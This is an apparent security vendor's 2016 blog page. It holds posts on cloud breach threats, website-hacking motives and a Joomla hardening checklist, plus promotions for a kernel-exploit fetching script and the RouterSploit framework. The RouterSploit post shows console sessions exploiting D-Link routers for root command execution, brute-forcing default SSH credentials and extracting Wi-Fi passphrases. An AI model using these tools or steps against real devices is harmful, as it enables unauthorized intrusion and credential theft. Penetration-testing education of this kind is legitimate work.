Friday, 15 April 2016

Who is responsible for your cloud application breach?

Cloud application security has been a big concern of lately due to several data breaches occurring in the cloud services such as the icloud hack, Target, Home Depot, United States internal Revenue system. Therefore the security of application poses a question as where does the responsibility of the application security lie?
Is it with the vendor or the company or person availing the services? The answer goes both sides, as the security aspect of the server side is only covered by the vendor of the cloud application services the client side still needs the security which is mostly overlooked by the people or the companies.
The client side application security is of utmost importance as only the server side security is not enough to protect the application from security breaches.
The different kind of security threats which pose a great danger to the cloud application security are as follows:

Data breaches

  • Account Hijacking
  • Compromised credentials
  • Permanent Data loss
  • Shared Technologies
  • Cloud service abuse
  • Hacked Interface and API

 

Data Breaches

This is one of the biggest threat to the cloud services because of the vast amount of data stored on the cloud servers. The sensitivity of the data can be imagined easily, as the cloud is storing the financial details as well as personal details of millions of people. And if this vast amount of data is breached in any case it will cause a downfall of the company and also a threat to the lives of people who have been exposed due to the breach.

 

Account Hijacking

This attack has been there for a quite long time, it includes Fraud, Phishing, Software Exploits etc. Using these kind of attacks, the cloud services can be compromised and can lead to launching of other attacks, changing the settings of account, manipulate transactions, uploading malwares and illegal contents.

 

Compromised Credentials

The credentials are compromised generally due to weak passwords, casual authentication, poor key or certificate management. Also the identity access management becomes a problem as the user access are sometimes not changed with the job role and responsibilities or when the user leaves the organization.
Embedding credentials and cryptographic keys in source code and leaving them in the online repositories such as GitHub also makes a big vulnerability which can be exploited easily. Aligning the identity with the cloud provider needs an understanding of the security measures taken in account.

 

Permanent Data Loss

Malicious hackers have gained access to the cloud services and deleted data permanently in the past affecting the business. Also the cloud data centers are vulnerable to natural disasters which can swipe away the data which has been stored on the cloud.
If the user encrypts the data before uploading to the cloud and loses the key then data is lost. Thus the client side protection of data should be managed and well kept. Permanent data loss can lead to financial crisis and disruption of the working system.

 

Shared Technologies

As the cloud service providers share infrastructure, platforms and applications from different sources therefore any reconfiguration or vulnerability in these layers affects the users and can also lead to compromise of the users system as well as the cloud depending upon the potential of the vulnerability.
Thus the security alone at the cloud server side is not only the real issue, Security has to be maintained at a vast level consisting of all the aspects of the cloud environment. The client side also needs to be secured as the attacks also possible from the client side due to low or no security measures.

 

Cloud Service Abuse

Cloud applications are breached to gain access to the commanding position in the cloud where the resources can be used for different malicious purposes such as launching a DDOS attacks or sending bulk spams and phishing emails, breaking an encryption key or hosting Malicious content.
This abuse may lead to unavailability of the services or can also lead to loss of data of the users stored on the cloud, therefore it is very much necessary to secure the applications from abuse.

 

Hacked Interface and API

To build an application now the developers are using ready to use interfaces and API to make their work simple, but these API’s and Interfaces tend to be the most exposed part of the system as they are available freely on the internet.
Almost every cloud service and application now offer API, IT reams are using these interfaces to interact with the cloud services such as management, provisioning, monitoring etc. Thus the level of threat to the cloud services increases manifold. This requires rigorous code reviews and penetrating testing to secure the application and services.

 

Conclusion

As we see that there are a lot of possibilities of breaching your data stored in the cloud due to the importance of data. Therefore your data cannot be secured alone just by the cloud service provider, there is a shear work required from the client side to protect the application and data from the outer security threats. Therefore security audits should be done in order to secure your precious data from threats.

Please do not hesitate to contact us for your budget security test [email protected].





Wednesday, 13 April 2016

Why Hackers Can Target your Website?

Today website hacking does not limited to any one aspect or motive, there are different purpose for which websites are hacked now on a daily basis.
Defacement of website is generally what is considered as website hacking but it is not all, there is a lot more to it and is more than other things. Talking about website hacking we have classified the most sought reasons, 

which are as follows:
  • Lack of Awareness
  • Economic Gains
  • System resources
  • Revenge Hacking or Competition
  • Showing off skills
  • Script Kiddies
Capture

Lack of Awareness

This is one of the major cause of low security of the websites. People work on the outdated technologies and software, and also do not apply the vendor patches. They do not have any security measures installed to protect their websites against the attacks. This happens due to overconfidence or no knowledge about the security.
There are new ways and new vulnerabilities revealed every day which may or may not concern you but it may harm the website in some aspects, thus proper security and care of the website is very important. Once the user lose confidence due to website failure they will move to alternatives which will be a loss to the company. So to avoid this proper security measures are very important.

Economic Gains

As the name suggests this type of hacking is for Monitory Benefits. The attack of this kind are known as Drive by downloads and Blackhat SEO campaigns. Drive by Download means injecting some malicious code into the website and then affecting all the users of that website, by downloading the malicious files to their systems while Blackhat SEO refers to redirecting users to different websites which may have not been intent of the users. In this way, there will be a sense of dismal among the users giving a bad impression of the website and ultimately affecting the number of visits.
Example: Downloading a malware on user system and getting all credentials such as usernames and passwords of all the websites visited, including financial details.

System Resources

This is also a major cause for hacking of websites, the hackers use the resources such as bandwidth and physical server resources for their illegal purposes. The hackers compromise the website using the Bots and the Malicious Scripts which give them access to the server and they can use the resources as an administrator.
The bots can be used in different kind of distributed web attacks like Dos attacks, Brute force attacks or other automated attacks against other websites. Due to these illegal activities from your website your host may shut you down causing a lot of trouble for you and your users.
Example: Hacking to store illegal pirated software copies and pornographic contents. Also indulging in DOS attacks and DDOS

Revenge Hacking or Competition

Due to High competition in today’s world for providing services, there is a greater probability of your website getting hacked for the benefit of other websites.
Also the losses suffered by others due to your good services may come as a revenge threat. There may be some group of people who would like to bring down your website to bring a bad name and a situation of distrust among the users.
Example: Company A & B are into same business, A gets Hacked so the customers of A will be going to B for services thus eliminating A as a competition.

Show Off

Several Hackers just hack the websites for fun and showing off theirs skills to the hacker community to get name and fame. This kind of hacking is done without any purpose it just exploits the security vulnerabilities present in your website. There are a lot of hackers of this kind who continuously look out for vulnerable websites and hack them thus affecting the website and its services for quite some time.
Example: Posting the defaced website links and screen shots on public domain with the coded name and claiming to have hacked it.

Script Kiddies

Script Kiddies are the people who do not have the working knowledge of the computer and networks, they are people who are trying to hack a website using the scripts written by other hackers without understanding the process of hacking.
Script Kiddies do these things to make themselves famous among their peers to get recognition as a hacker or to attract attention of someone. There is no other motive than this, and any website having vulnerability can be exploited by the script kiddies, which will hinder the services of the website and will upset the users.

Conclusion

As your website holds your presence online therefore it is important to secure it. Also it gives your some revenue from the advertisements if it holds any. People are less aware of the website security threats in compare to web applications which leads them to be an easy bait for the hackers to bring down their website.
People will lose their trust on your services if your website is hacked, therefore proper security methods are required to secure your website from the threats, which can be implemented after a security audit by a professional or security company.
We are offering such website security services at a very decent price of $99, if you need any kind of security services do contact us at [email protected]

Thursday, 7 April 2016

Security Test Checklist for Joomla 3

Any website can be hacked. There is no set of security steps that you can take to keep your site 100% safe from hacking. Hackers may be malicious and actually steal information from your site. Other hackers may be pranksters that simply want to bring down your site and replace it with obnoxious graphics. Your site could be hacked and you don't even know it, the hackers are just monitoring the site to see if any goodies show up.
There are steps that you can take that increase the security of your site and make it safer. 

Basic security steps:

Only install official versions of Joomla.

Joomla installations are often included with third party templates. They offer a one step install where you install Joomla and their template is already set up as the default with all its custom appearance, functionality, components and plugins. Be very wary of these offers. Be sure that these are popular and highly regarded templates. If they don't offer the option of installing the template separately from the Joomla installation, steer clear. It could be that the Joomla version has core files that have been changed, causing conflicts with other extensions and upgrades. It could be that the plugins they have installed have vulnerabilities.

Never use 'admin' as a login name, never

Do not use admin or other obvious login names for logging into your Joomla site. If you have multiple contributors, do not use some standard way of creating login names, such as last name-first initial. It makes it too easy to figure out for others. You may think that the password will be enough, but having an obvious login name is a foot in the door.

Use well formed and unique passwords

Passwords should never be regular words. They should be a long combination of upper and lower case letters, numbers and a special character or two or three. The more characters in your password, the better.

Change your password from time to time

It is a good idea to change your login password on a regular basis.

Never give your password to others to get into the site

Even if you trust someone completely, it is better to create a user account that you can delete later. 

Backup, backup, backup

Backup your site's files and database regularly. Backup again before making major changes or installing any extension or template. Backup before running upgrades.

Keep your Joomla site up to date

Upgrading can be a bothersome task, but it is still better to take the steps to upgrade if a new version comes out. Newer versions will have fixed known security issues.

Check your Users list in User Manager

See if there are any registered users that should not be there. If there are, it may mean that your site has already been hacked.

Remove the login module if you don't use it

If you don't need people to login into the front end, remove or unpublish the login module. You can still login to the front end of your site by adding
index.php?option=com_users&view=login
to the end of your url if you need to.
The login form creates an open invitation to hackers. Keep in mind, a Joomla hacker will know how to get to the login form even without a login form displayed in a module or page. Removing the login form will only keep out the novice hacker.

Turn off user registration, if you don't need it

If you don't have a forum, allow comments or have some other reason for users to register, turn off Allow User Registration in the Global Configuration for Users Manager. If you do leave it on, never allow users to be any level higher than Registered unless you take manual steps to allow them more permissions.

Installing Extensions

Backup your site before installing extensions

Backup your entire site, folders and database, before installing any extension or running any upgrade.
Learn how to restore the backed up files and database in the case that your site is hacked.

Only use popular and highly rated extensions

Check extensions.joomla.org for the rating on any extension. Popular extensions will likely keep up with Joomla upgrades. Even good and popular extensions can introduce security loopholes. If an extension is not listed at extensions.joomla.org, it probably should not be installed.

Review the Joomla Vulnerable Extension list

You can see a list of extensions that have known issues at vel.joomla.org. Some extension providers will have fixed the problems and have a newer version, so watch what version is on the Vulnerability list.

Only use Open Source extensions

Extensions, whether components or plugins, can come open-source or encrypted. If they are open-source, the code is all visible as PHP, JavaScript or other readable script. If it is encoded, there is an added possibility that it has hidden security risks.

Install Security Extensions

Go to extensions.joomla.org and research Joomla extensions that increase site security, if added security is important for your site. Some of these extensions will have lockouts for someone entering a wrong password too many times, so be sure YOU don't try too many passwords.

Minimize the number of extensions you have installed

The more extensions you have installed, the more places for hackers to break into your site. You should also minimize the number of extensions for site speed and ease of upgrading.

Your Hosting Environment, Folders, Files and Database

Consider using an SSL server 

Sites that have an SSL certificate have https:// for the protocol. This protocol uses encryption to send data over the web. It is not 100% safe, but it is much safer than not having this functionality. This protocol does not protect your site itself from hackers, it simply encrypts the data being uploaded and downloaded. You should purchase an SSL certificate if you:
  • Deal with any personal information about your registered users, even something like email addresses or phone number
  • If your site deals with money transaction
  • If you have forms that ask for personal information, such as event registration, forum registration, etc.

Use dedicated servers if possible

Most discount web hosting use shared hosting to keep the costs down. If you have a site with information that should not be public, consider the added costs of dedicated hosting. This way, your Joomla site is on its own server. As an added benefit, dedicated servers are also much faster than shared servers as far as downloading large web sites.

Protect your hosted folders and files

Watch the permission settings on your folders and files. Hackers can tell you have a Joomla site by simply looking at the source code and will know which files have security vulnerabilities. Folders should have permission level of 755 and files 644. Unfortunately if you assign even higher security permission levels, you can break your site as Joomla needs to access certain files and folders to work properly.

If you create new folders, add an index.html placeholder file

If you create folders in your Joomla installation via FTP or through your hosting control panel, you should include a placeholder index.html file in the folder along with the other files. This keeps hackers from being able to list the content of the folder in a browser window.

Keep your site's folders and files tidy

Remove any unused files or folders. Be sure to remove the installation folder after installing Joomla, don't just rename it.

Use separate login and password for hosting login, database login and Joomla login

Do not use the same login and password for your Joomla site as for your hosting account and/or database. This is like having the same set of keys for every item you own. If the thief has one set of keys, he can steal everything.

.htaccess security steps

You can add lines to your .htaccess file that will keep the casual hacker from accessing specific folders.

My Joomla site has already been hacked, what do I do?

Refer to this Joomla.org article:
https://docs.joomla.org/Security_Checklist/You_have_been_hacked_or_defaced

Wednesday, 6 April 2016

AutoLocalPrivilegeEscalation Tool

An automated script that download potential exploit for linux kernel from exploitdb, and compile them automatically
This script is created due to Hackademics, there are so much possible exploit for that version of kernel, as a rookie OSCP student, I am not able to find out the correct exploit, also I am too lazy to test them one by one. So I hope this script can help me in the future.
First, it search for linux pirvilege escalation from the exploitdb in local directory by searchsploit.
Pass in the kernel version as first parameter, it lists potential exploit, and ask if you want to copy them from the local directory.
After that, it asks if you want to compile the downloaded C file.
Then, it will ask if you want to make a tar ball of the directory.
And it will show the summary of the downloaded files.

How to use  




Download tool : https://goo.gl/jTQTsy

Tuesday, 5 April 2016

The Python Router Exploitation Framework Tool

The RouteSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aids penetration testing operations:
  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check if target is vulnerable to any exploit

How to install  


sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

How to use

    

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) > 
U can use tab key for completion.

Options

Display module options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port
Set options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root
It is also possible to check if the target is vulnerable to particular exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info

Display information about exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module

Modules located under creds/ directory allow running dictionary attacks against various network services.
Following services are currently supported:
  • ftp
  • ssh
  • telnet
  • http basic auth
  • http form auth
  • snmp
Every service has been divided into two modules:
  • default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
  • bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
Console:
rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) > 

Options

rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings                                                      Description                                              
   ----         ----------------                                                      -----------                                              
   threads      8                                                                     Numbers of threads                                       
   defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)
Set target:
rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) > 

3. Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits.

Pick module

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                
Set target:
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure
It has been verified that target is vulnerable to dwr_932_info_disclosure exploit. Now use proper module and exploit target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0
Download Tool : https://goo.gl/7SA1sE